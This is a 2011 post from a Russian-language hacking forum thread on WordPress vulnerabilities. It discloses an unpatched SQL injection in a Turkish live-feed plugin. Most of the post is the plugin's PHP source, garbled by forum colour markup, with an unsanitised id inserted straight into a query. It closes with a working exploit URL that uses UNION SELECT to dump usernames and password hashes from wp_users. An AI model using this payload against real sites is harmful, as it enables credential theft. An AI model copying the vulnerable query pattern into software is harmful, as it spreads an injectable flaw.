Тема: [ Обзор уязвимостей WordPress ]
Показать сообщение отдельно

  #6  
Старый 04.08.2011, 18:16
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию
PLUGIN :: [0day] AlixcaN Canlı Yayın Eklentisi ver.1.0 [SQL-inj]

alixcan_life_f.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]){echo[/COLOR][COLOR="#DD0000"]'Gönderdiğiniz Feedler





ID

Mesaj

Tarih



'[/COLOR][COLOR="#007700"];

 while ([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"])){

 echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

 echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

 echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]baslik[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

 echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

 echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

 }

 }

echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

if([/COLOR][COLOR="#0000BB"]$sayfalar[/COLOR][COLOR="#007700"]>=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$sayfa[/COLOR][COLOR="#007700"]Sayfalar: '[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'index.php?feedlist=alix_feed_list&'[/COLOR][COLOR="#007700"];

for([/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]'[/COLOR][COLOR="#007700"];

 echo ([/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]$sayfa[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"];

 echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

 }

echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

}





echo[/COLOR][COLOR="#DD0000"]'Feed Gönder'[/COLOR][COLOR="#007700"];

}elseif(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'edit'[/COLOR][COLOR="#007700"]]) ==[/COLOR][COLOR="#DD0000"]'dashboard_alix_live#dashboard_alix_live'[/COLOR][COLOR="#007700"]){

 echo[/COLOR][COLOR="#DD0000"]'

Kullanımı Cok Basit Ve Bloğuna Bağlı Bir Yazar İçin Gayet Hoş Bir Eklenti.

Facebooktaki "Ne Düşünüyorsunuz?" Mantığı İle Benzer. Bir Yazı, Resim Veya Hem Yazı Hem Resim Paylaşma İmkanı Sağlamaktadır.

Bu Yazıları



[alixcan_live_feed] - Tüm Yazıları Listeler


[alixcan_live_feed id=""] - Belirlediğiniz Yazıyı İstediğiniz Yerde Listeler



Yukarıdaki Shortcodeları Kullanarak İstediğiniz Şekilde Listeletebilirsiniz.

'[/COLOR][COLOR="#007700"];

} else{[/COLOR][COLOR="#0000BB"]?>

[/COLOR]

[COLOR="#0000BB"][/COLOR][COLOR="#0000BB"]$baslik[/COLOR][COLOR="#007700"],

[/COLOR][COLOR="#DD0000"]'resim'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$resim[/COLOR][COLOR="#007700"],

[/COLOR][COLOR="#DD0000"]'date'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$date

[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]insert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'wp_alixlivefeed'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$veri_dizisi[/COLOR][COLOR="#007700"]);

echo[/COLOR][COLOR="#DD0000"]'Yazı Eklendi'[/COLOR][COLOR="#007700"];

}[/COLOR][COLOR="#FF8000"]/*submittwit bitimi */[/COLOR][COLOR="#0000BB"]?>

[/COLOR]

jQuery(document).ready(function() {

jQuery('#upload_image_button').click(function() {

formfield = jQuery('#upload_image').attr('name');

tb_show('', 'media-upload.php?type=image&TB_iframe=true');

return false;

});

window.send_to_editor = function(html) {

imgurl = jQuery('img',html).attr('src');

jQuery('#upload_image').val(imgurl);

tb_remove();

}

});





Başlık:En Fazla 255 Karakter







Resim:





Resim Dosyası Yükleyebilirsiniz Yada Direk Link Yazabilirsiniz.Dosya Yüklendikten Sonra Yazıya Dahil Et Butonuna Basınız Link Otomatik Eklenicektir



[/COLOR]" />







Feedleri Listele

[COLOR="#0000BB"]Kapat'[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]'Hakkında'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]wp_add_dashboard_widget[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'alixcan_live_feed_ali'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]__[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Canlı Yayın & Live Feed'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$yazi[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]'alixcan_live_feed_ali'[/COLOR][COLOR="#007700"]);

}

[/COLOR][COLOR="#0000BB"]add_action[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'wp_dashboard_setup'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'alixcan_live_feed_setup'[/COLOR][COLOR="#007700"]);

function[/COLOR][COLOR="#0000BB"]head_ekle[/COLOR][COLOR="#007700"](){

echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

}

[/COLOR][COLOR="#0000BB"]add_action[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'wp_head'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'head_ekle'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]add_shortcode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'alixcan_live_feed'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'alixcan_live_feed_shortcode'[/COLOR][COLOR="#007700"]);

function[/COLOR][COLOR="#0000BB"]alixcan_live_feed_shortcode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$atts[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]){

global[/COLOR][COLOR="#0000BB"]$post[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]extract[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]shortcode_atts[/COLOR][COLOR="#007700"]( array([/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) ,[/COLOR][COLOR="#0000BB"]$atts[/COLOR][COLOR="#007700"]) );

if(empty([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])){





[/COLOR][COLOR="#0000BB"]$sayfa_basina[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$sayfa_sor[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT COUNT(`id`) FROM `wp_alixlivefeed`"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$sayfalar[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]ceil[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]mysql_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sayfa_sor[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) /[/COLOR][COLOR="#0000BB"]$sayfa_basina[/COLOR][COLOR="#007700"]);



[/COLOR][COLOR="#0000BB"]$sayfa[/COLOR][COLOR="#007700"]= (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'alix_sayfa'[/COLOR][COLOR="#007700"]])) ? (int)[/COLOR][COLOR="#0000BB"]abs[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'alix_sayfa'[/COLOR][COLOR="#007700"]]) :[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$basla[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$sayfa[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) *[/COLOR][COLOR="#0000BB"]$sayfa_basina[/COLOR][COLOR="#007700"];



[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM wp_alixlivefeed LIMIT[/COLOR][COLOR="#0000BB"]$basla[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$sayfa_basina[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

if([/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"])>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]){echo[/COLOR][COLOR="#DD0000"]'

'[/COLOR][COLOR="#007700"];

while ([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"])){

echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

echo (!empty([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]resim[/COLOR][COLOR="#007700"])) ?[/COLOR][COLOR="#DD0000"]'[/COLOR][COLOR="#0000BB"]resim[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" target="_blank" title="'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]baslik[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'">[/COLOR][COLOR="#0000BB"]resim[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" />'[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

echo[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]baslik[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'





'[/COLOR][COLOR="#007700"];

}echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

}else{

echo[/COLOR][COLOR="#DD0000"]'Henüz İçerik Girilmemiş'[/COLOR][COLOR="#007700"];

}





if([/COLOR][COLOR="#0000BB"]$sayfalar[/COLOR][COLOR="#007700"]>=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$sayfa[/COLOR][COLOR="#007700"]Sayfalar: '[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_option[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'home'[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]'?p='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]get_the_ID[/COLOR][COLOR="#007700"]();

for([/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]'[/COLOR][COLOR="#007700"];

echo ([/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]$sayfa[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"];

echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

}

echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

}

echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];



}else{



[/COLOR][COLOR="#0000BB"]$sqlsor[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM wp_alixlivefeed WHERE id='[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sqlsor[/COLOR][COLOR="#007700"]);

echo[/COLOR][COLOR="#DD0000"]'

'[/COLOR][COLOR="#007700"];

echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

echo (!empty([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]resim[/COLOR][COLOR="#007700"])) ?[/COLOR][COLOR="#DD0000"]'[/COLOR][COLOR="#0000BB"]resim[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" target="_blank" title="'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]baslik[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'">[/COLOR][COLOR="#0000BB"]resim[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" />'[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

echo[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]baslik[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'







'[/COLOR][COLOR="#007700"];



}[/COLOR][COLOR="#FF8000"]//else

[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#FF8000"]// func biter[/COLOR][/COLOR] 
exploit:

Код:
http://wp/?alixcan_live_feed=news&id=1+UNION+SELECT+group_concat(user_login,0x3a,user_pass+SEPARATOR+0x3c62723e),2,3,4+FROM+wp_users--
 
Ответить с цитированием